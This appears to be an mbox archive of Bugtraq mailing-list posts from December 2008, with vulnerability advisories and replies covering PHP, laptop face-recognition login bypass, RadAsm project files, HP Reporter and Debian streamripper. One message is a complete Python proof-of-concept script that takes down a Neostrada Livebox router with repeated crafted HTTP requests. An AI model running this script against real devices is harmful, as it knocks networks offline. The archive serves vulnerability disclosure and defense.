    http://localhost/mallpage.txt or http://localhost/mallpage<non extenstion>.

From - Mon Dec  8 12:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f09
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38855-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id ACEFEECAD7
for <lists@securityspace.com>; Mon,  8 Dec 2008 12:09:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 51550237082; Mon,  8 Dec 2008 08:39:01 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 27097 invoked from network); 8 Dec 2008 13:30:32 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=simple; s=one; d=codelabs.ru;
h=Received:Date:From:To:Cc:Subject:Message-ID:References:MIME-Version:Content-Type:Content-Disposition:In-Reply-To:Sender;
b=Vk6gDbmapi1JrJ5sykfUISj6ghB+heDdJ1NhPyIkuP/oudZ9ruiihfekXmdX1pSYDqMBLTNQFUDFOEc7TA+F25NcOSWdqrjNdPZ7su+thcK09g0S6t9qoLhfBNy79cri9ZV/cXGZRYQlquA5QTfGpJfzE2CWznEL47ioM9bnJHI=;
Date: Mon, 8 Dec 2008 16:47:36 +0300
From: Eygene Ryabinkin <rea-sec@codelabs.ru>
To: Maksymilian Arciemowicz <cxib@securityreason.com>
Cc: bugtraq@securityfocus.com
Subject: Re: SecurityReason: PHP 5.2.6 SAPI php_getuid() overload
Message-ID: <REgd3r0TFgmK/BeL3kQXz4zNIX0@kjaK+/sQ5DW5981v71UogZJPf/0>
References: <200812061940.mB6JemE5002856@www5.securityfocus.com> <sqp89FAGtFIVr1Bhz/kFH6+7Yu4@DnrfhFPe1KmBT9SMnrHVxzpiU9A> <493D1DBC.4060400@securityreason.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Disposition: inline
In-Reply-To: <493D1DBC.4060400@securityreason.com>
Sender: rea-sec@codelabs.ru
Status:   

Maksymilian,

Mon, Dec 08, 2008 at 02:14:36PM +0100, Maksymilian Arciemowicz wrote:
> > Sat, Dec 06, 2008 at 12:40:48PM -0700, cxib@securityreason.com wrote:
> >> [ SecurityReason.com : PHP 5.2.6 SAPI php_getuid() overload ]
> > [...]
> >> Using PHP 5.2.6, as a Apache module can bypass many security points.
> > 
> > Am I right that this vulnerability exists only in the Apache 1.x flavour
> > of the PHP module?  The code in question that sets SG(server_context)
> > too late and initializes BG variable after the .htaccess processing
> > exists only in sapi/apache/mod_php5.c.  For Apache 2.x module the
> > handler is 'php_handler', it lives in apache2{filter,handler}/sapi_apache2.c
> > and BG/SG(server_context) are initialized before .htaccess processing.
> 
> yes
> 
> BG(page_uid)=BG(page_gid)=0
> 
> should be -1
> 
> so
> 
> php_getuid() will return 0.
> 
> tested on apache 13 20 22

Yes, sorry: I missed the 'AllowOverride All' for my 2.2 testbed.

Once again, sorry for the confusion: the issue is here for 2.x too.
-- 
Eygene

From - Mon Dec  8 12:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f0a
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38856-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CF7F0ECBB2
for <lists@securityspace.com>; Mon,  8 Dec 2008 12:18:37 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 17834237043; Mon,  8 Dec 2008 08:46:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 18966 invoked from network); 8 Dec 2008 04:23:01 -0000
X-Spam-Processed: bkav.com.vn, Mon, 08 Dec 2008 11:40:34 +0700
(not processed: spam filter heuristic analysis disabled)
X-Authenticated-Sender: svrt@bkav.com.vn
X-MDRemoteIP: 192.168.111.124
X-Return-Path: svrt@bkav.com.vn
X-Envelope-From: svrt@bkav.com.vn
X-MDaemon-Deliver-To: bugtraq@securityfocus.com
Message-ID: <F3C3C459039F462D92A8E46CEB461442@minhbqPC>
From: "SVRT-Bkis" <svrt@bkav.com.vn>
To: <bugtraq@securityfocus.com>, <full-disclosure@lists.grok.org.uk>
Subject: [SVRT-07-08] Vulnerability in Face Recognition Authentication Mechanism of Lenovo-Asus-Toshiba Laptops
Date: Mon, 8 Dec 2008 11:39:48 +0700
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6001.18000
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6001.18000
Status:   

VULNERABILITY IN FACE RECOGNITION AUTHENTICATION MECHANISM
                               LENOVO-ASUS-TOSHIBA LAPTOPS

1. General Information

Face Recognition feature is provided by Asus, Lenovo and Toshiba as 
specialized software that is issued together with their laptops. This 
feature is embedded into all laptop families having webcams and supporting 
Windows Vista, XP operating system. Owners of laptops benefiting from this 
technology do not have to type in their passwords or use their fingerprint 
but to sit in front of their laptops to login.

Face-recognition is introduced by these vendors as a remarkable feature 
which helps prevent unauthorized people breaking into laptops and ensure 
information security for their owners.

Details : http://security.bkis.vn/?p)2
SVRT Advisory : SVRT-07-08
Initial vendor notification :  20-11-2008
Release Date : 08-12-2008
Update Date : 08-12-2008
Discovered by : SVRT-Bkis
Attack Type : Authentication Mechanism Bypass
Security Rating : Critical
Impact : Loss of Confidentiality and Integrity
Affected Software : Lenovo Veriface III (prior version is vulnerable)
                              Asus SmartLogon V1.0.0006 (prior version is 
vulnerable)
                              Toshiba Face Recognition 2.0.2.32 (prior 
version is vulnerable)

Video demo: 
http://security.bkis.vn/Proof-of-concept/Face_Recognition/FaceRecognitionBypassing_DemoVideo.wmv

2. Technical Description

After 4 months researching on Face Recognition technology apply on laptop, 
Bkis, Vietnam, has come to a conclusion that the User Authentication 
Mechanisms Based on Face Recognition of Asus, Lenovo and Toshiba haven't met 
security needs.

Bkis research show that the Authentication Mechanism Based on 
Face-Recognition of these 3 laptop vendors can all be bypassed, even when 
set at highest security level.

In order to make use of this technology, a laptop's owner uses webcam to 
capture his or her face at a close distance and at different viewpoints. 
This step helps the laptop to "remember" facial characteristics of its 
owner, and store these data in the face database. Bkis's research, however, 
show that an unauthorized person can easily regenerate suite of fake face 
recognition to bypass the authentication mechanism.

Performing tests on laptops with 1.3 Megapixel camera produced by Lenovo - 
Asus - Toshiba, using the Bypass Model above with special photos or videos 
of some users, we have been able to pass the User Authentication Based on 
Face Recognition and log into user accounts on Windows Vista without 
difficulty.

All the applications tested are of their latest versions and are set to 
Highest Security Level.
- Lenovo Veriface III
- Asus SmartLogon V1.0.0005
- Toshiba Face Recognition 2.0.2.32

3. Solution

In the mean time waiting for this vulnerability to be fixed, Bkis recommends 
that users all over the world stop using face authentication to log in their 
laptops.

Credit
Thanks Le Nhat Minh, Nguyen Minh Duc, Bui Quang Minh, Le Minh Hung.

----------------------------------------------------------------
Security Vulnerability Research Team (SVRT-Bkis)

Bach Khoa Internetwork Security Center (Bkis)
Hanoi University of Technology (Vietnam)

Office: 5th Floor, Hitech building - 1A Dai Co Viet, Hanoi, Vietnam
Tel: 84.4.38 68 47 57 Ext 128
Mobile: +84 983 60 99 20
Email: svrt@bkav.com.vn
Website: www.bkav.com.vn
----------------------------------------------------------------  


From - Mon Dec  8 14:59:22 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f10
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38857-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 4E6CCECDBE
for <lists@securityspace.com>; Mon,  8 Dec 2008 14:53:46 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 919C2236F43; Mon,  8 Dec 2008 12:40:15 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 31727 invoked from network); 8 Dec 2008 15:50:58 -0000
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:cc:in-reply-to:mime-version:content-type
         :content-transfer-encoding:content-disposition:references;
        bh=ncs+E9cxtEuWmHqSNHIyQxVmOWw0awmUsn+jBjPEpCc=;
        b=x00bSkNZSAFHaH3j6WyJyJPlzGdgJ1stJGXplLefU3SM00Qi2xYI1JIl0SvXjdGfNg
         mBQiR0qvKAPrq3FQ5mxmJYJPKXJNn3FLV+Xe9iuEq83NREQjHtJYjxjoPrmHPEinV3SK
         2A/2fXP/9RuNFDD/U6NDyEos96UIwnd/pK2ycDomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:cc:in-reply-to:mime-version
         :content-type:content-transfer-encoding:content-disposition
         :references;
        b=El/EvKtJjSUQDbtpIu7BtTazKLp6PbIaNqLpePs/n2VNt1EPrHHflv2pOqsjoU+pu7
         MdhPAyXJasHm9xEcbtFTirPLwRO5YN0Gnq7C3b8e9jzj43iKaI5JebHSSv0XhkwwJKJq
         xT+npNK1Bm7XqlfXEOZcQkmxCRo7AYLE06QmYMessage-ID: <92302a090812080807j5942eaecm175ea42e78bebcb@mail.gmail.com>
Date: Tue, 9 Dec 2008 00:07:57 +0800
From: "Li Gen" <superligen@gmail.com>
To: bugtraq@securityfocus.com
Subject: Re: RadAsm <=2.2.1.5 Local Command Execution
Cc: xhakerman2006@yahoo.com
In-Reply-To: <20081208055445.20160.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <20081208055445.20160.qmail@securityfocus.com>
Status:   

Hi ,
    I don't think this is a vulnerability. If this is a vulnerability,
Makefile is also a vulnerability. Do you think so?
   Regards


2008/12/8 <xhakerman2006@yahoo.com>
>
> ------------------------------------------------------------------
> vulnerability discovered by DATA_SNIPER.
> bug discovred in 25/11/2008.
> infected version:All Version
> greetz go to:www.at4re.com(Arab Team 4 Reverse Engineering),arab4services.net
> Critical: Highly critical
> Impact:Command Execution
> ------------------------------------------------------------------
> this is litel POC that can execute arabitrary command in victime machine.
> in unexpected way the attacker can put in the project file ".rap file" command instead of the linker path or  Macro Assembler "ML.exe" path.
> project file look like this.
> " some data has been cuted for making it readable"
> -------------------------------------
> project file structure
> [Project]
> Assembler=masm
> Type=Win32 App
> ......datat
> [Files]
> 1=file.Asm
> .....data
> [MakeFiles]
> 5=CRC Check.exe
> [MakeDef]
> Menu=1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0
> 1=4,O,$B\RC.EXE /v,1 <==Command Execution by replacing the original file path with the command
> 2=3,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",2  <==Command Execution by replacing the original file path with the command
> 3=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /RELEASE /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> 4=0,0,,5
> 5=rsrc.obj,O,$B\CVTRES.EXE,rsrc.res <==Command Execution by replacing the original file path with the command
> 7=0,0,"$E\OllyDbg",5
> 6=*.obj,O,$B\ML.EXE /c /coff /Cp /nologo /I"$I",*.asm
> 11=4,O,$B\RC.EXE /v,1   <==Command Execution by replacing the original file path with the command
> 12=3,O,$B\ML.EXE /c /coff /Cp /Zi /nologo /I"$I",2   <==Command Execution by replacing the original file path with the command
> 13=5,O,$B\LINK.EXE /SUBSYSTEM:WINDOWS /DEBUG /VERSION:4.0 /LIBPATH:"$L" /OUT:"$5",3,4 <==Command Execution by replacing the original file path with the command
> data.....
> [Resource]
> data.....and more data.
> ----------------------------------------------------------------------
> as you see " <==Command Execution breplacing the original file name with the command" this mean, that type of data in the project it's  exploited as command execution by malicious people.
> and when the user try to compile the project will face the issue of executing bad command in his operating system.

From - Mon Dec  8 15:09:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f12
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38860-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 011BAECDBE
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:06:33 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id A6C43143BD9; Mon,  8 Dec 2008 11:58:30 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12132 invoked from network); 8 Dec 2008 19:06:13 -0000
To: bugtraq@securityfocus.com
From: security-alert@hp.com
Subject: [security bulletin] HPSBMA02391 SSRT071481 rev.1 - HP OpenView Reporter and HP Reporter Running on Windows, Remote Denial of Service (DoS)
Date: Mon, 08 Dec 2008 11:23:19 -0800
Sender: secure@hpchs.cup.hp.com
Message-Id: <20081208192319.CFC00BD83@hpchs.cup.hp.com>
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01612418
Version: 1

HPSBMA02391 SSRT071481 rev.1 - HP OpenView Reporter and HP Reporter Running on Windows, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2008-12-08
Last Updated: 2008-12-08

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP OpenView Reporter and HP Reporter running on Windows. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2007-4349

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Reporter v3.7, HP Reporter v3.8 running on Windows

BACKGROUND

CVSS 2.0 Base Metrics 
==============================================Reference                         Base Vector               Base Score 
CVE-2007-4349    (AV:N/AC:M/Au:N/C:N/I:N/A:P)      4.3
==============================================Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

RESOLUTION

HP OpenView Reporter v3.7 

HP has provided a hotfix to resolve this vulnerability for HP OpenView Reporter v3.7. Please contact the normal HP Services support channel and request the LCore - XPL Hotfix: "Trace Service crashes due to improper handling of Trace Event Message."

HP Reporter v3.8 

HP has provided a hotfix to resolve this vulnerability for HP Reporter v3.8. Please contact the normal HP Services support channel and request the LCore - XPL Hotfix: "Hotfix XPL 6.0."

PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 8 December 2008 Initial release 

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com 
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. 
To get the security-alert PGP key, please send an e-mail message as follows:
  To: security-alert@hp.com 
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: 
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC 
On the web page: ITRC security bulletins and patch sign-up 
Under Step1: your ITRC security bulletins and patches 
  - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems 
  - verify your operating system selections are checked and save.


To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php 
Log in on the web page: Subscriber's choice for Business: sign-in. 
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.


To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do 


* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title: 

GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
 
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.


"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

�Copyright 2008 Hewlett-Packard Development Company, L.P. 

Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBST0AQeAfOvwtKn1ZEQKzUQCfZglmIyfwq0d1gpuNfrT3cX9uenEAoKt4
OmnpKSPDhIKewUtRQzy4pYtp
=v+73
-----END PGP SIGNATURE-----

From - Mon Dec  8 15:19:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f13
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38861-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 4721CECC7D
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:15:59 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 69484143C5C; Mon,  8 Dec 2008 11:58:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12185 invoked from network); 8 Dec 2008 19:08:20 -0000
Date: Mon, 8 Dec 2008 12:12:51 -0700
Message-Id: <200812081912.mB8JCp8d030115@www5.securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)
From: 0in.email@gmail.com
To: bugtraq@securityfocus.com
Subject: Neostrada Livebox Remote Network Down PoC Exploit
Status:   

# Neostrada Livebox Router Remote Network Down PoC Exploit
# Author: 0in aka zer0in from Dark-Coders Group!
# Contact: 0in.email(at)gmail.com / 0in(at)dark-coders.pl
# Site: http://dark-coders.pl
# Greetings to: All Dark-Coders Members: die,doctor,m4r1usz,sun8hclf ;*
#               Friends: cOndemned,joker,chomzee,TBH
#               IRC: #dark-coders & #pvt
# Description:
#       When we send a "specially crafted http packet" x ~25
#       Livebox HTTP service && all network goes down
# Simple PoC source:
#!/usr/bin/python

from socket import *
import os
import sys
target = "192.168.1.1"
def to_vuln(ip):
        suck = socket(AF_INET,SOCK_STREAM,0)
        try:
                conn = suck.connect((ip,80))
        except Exception:
                check(ip)
        return suck
def check(ip):
        print "[+] No HTTP response..."
        print "[+] Server and network should go down!"
        print "[+] Check it with ping..."
        os.system("ping "+ip)
i=0
print "[!] Neostrada Livebox Remote Network Down Exploit!!"
print "[!]              [HTTP DoS vuln]           "
print "[!]      by 0in [0in.email(at)gmail.com]           "
print "\n[+] Dosing..."
for i in range(256):
        pack3t = "GET /- HTTP/1.1\r\n\r\n"
        POC = to_vuln(target)
        POC.send(pack3t)
        try:
                POC.recv(512)
        except Exception:
                check(target)

From - Mon Dec  8 15:29:20 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00004f15
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-38859-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 79F80ECC7E
for <lists@securityspace.com>; Mon,  8 Dec 2008 15:25:45 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id 1CBF0143A06; Mon,  8 Dec 2008 11:58:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11139 invoked from network); 8 Dec 2008 18:41:36 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <fw@deneb.enyo.de>
X-Original-To: lists-debian-security-announce@liszt.debian.org
Delivered-To: lists-debian-security-announce@liszt.debian.org
From: Florian Weimer <fw@deneb.enyo.de>
Date: Mon, 08 Dec 2008 19:58:30 +0100
Message-ID: <87ej0i4hpl.fsf@mid.deneb.enyo.de>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Virus-Scanned: at lists.debian.org with policy bank moderated
X-Spam-Status: No, score=-8.58 tagged_above=3.6 required=5.3
tests=[FOURLA=0.1, FVGT_m_MULTI_ODD=0.02, IMPRONONCABLE_2=1,
LDO_WHITELIST=-5, MURPHY_WRONG_WORD1=0.1, MURPHY_WRONG_WORD2=0.2,
PGPSIGNATURE=-5]
X-Spam-Level: 
X-Debian: PGP check passed for security officers
Subject: [SECURITY] [DSA 1683-1] New streamripper packages fix potential code execution
Priority: urgent
Resent-Message-ID: <CKuzRy4PscF.A.uJB.g5WPJB@liszt>
Reply-To: listadmin@securityfocus.com
Mail-Followup-To: bugtraq@securityfocus.com
To: bugtraq@securityfocus.com
Resent-Date: Mon,  8 Dec 2008 18:58:40 +0000 (UTC)
Resent-From: list@liszt.debian.org (Mailing List Manager)
Status:   

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1683-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
December 08, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : streamripper
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-4337 CVE-2008-4829
Debian Bug     : 506377

Multiple buffer overflows involving HTTP header and playlist parsing
have been discovered in streamripper (CVE-2007-4337, CVE-2008-4829).

For the stable distribution (etch), these problems have been fixed in
version 1.61.27-1+etch1.

For the unstable distribution (sid) and the testing distribution
(lenny), these problems have been fixed in version 1.63.5-2.

We recommend that you upgrade your streamripper package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27.orig.tar.gz
    Size/MD5 checksum:   294218 8761dda030f92cbdfa38e73a981cc6bc
  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1.diff.gz
    Size/MD5 checksum:     5040 0a4fe994a155d07163b3455df5c2668b
  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1.dsc
    Size/MD5 checksum:      964 67ddf22de3c0642e41245e07e534c992

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_alpha.deb
    Size/MD5 checksum:    84142 9450efa0b7fcfce8e976a0a1acb9e837

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_amd64.deb
    Size/MD5 checksum:    75808 0d0d435b05e1c7b5bf2aa375b6569ae4

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_arm.deb
    Size/MD5 checksum:    70992 3d77dcfe3d7785aaed4544cdfd3a8489

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_hppa.deb
    Size/MD5 checksum:    77884 aff00b60cc13c3c46232f86a1bfab553

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_i386.deb
    Size/MD5 checksum:    71180 61c43e7298aac28f4e96287e7eb8b1b0

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_ia64.deb
    Size/MD5 checksum:    99678 b18634cd32a198e747aa99470d3863ab

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_mips.deb
    Size/MD5 checksum:    78584 a417879681280d7f4640557cf1b6085a

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_mipsel.deb
    Size/MD5 checksum:    78814 c92e229fc90db4cf408ee44a619545ee

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_powerpc.deb
    Size/MD5 checksum:    76114 45d0eaaea3a1ec5d874aa9f51221d89c

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_s390.deb
    Size/MD5 checksum:    75984 7aaff15041ece4095eaa1ab470aed7b6

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/s/streamripper/streamripper_1.61.27-1+etch1_sparc.deb
    Size/MD5 checksum:    70322 78e266c09b92286776216406420f1220


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJPW3fAAoJEL97/wQC1SS+xaIH/RD5w1SisDVPgeQ412g0TXVA
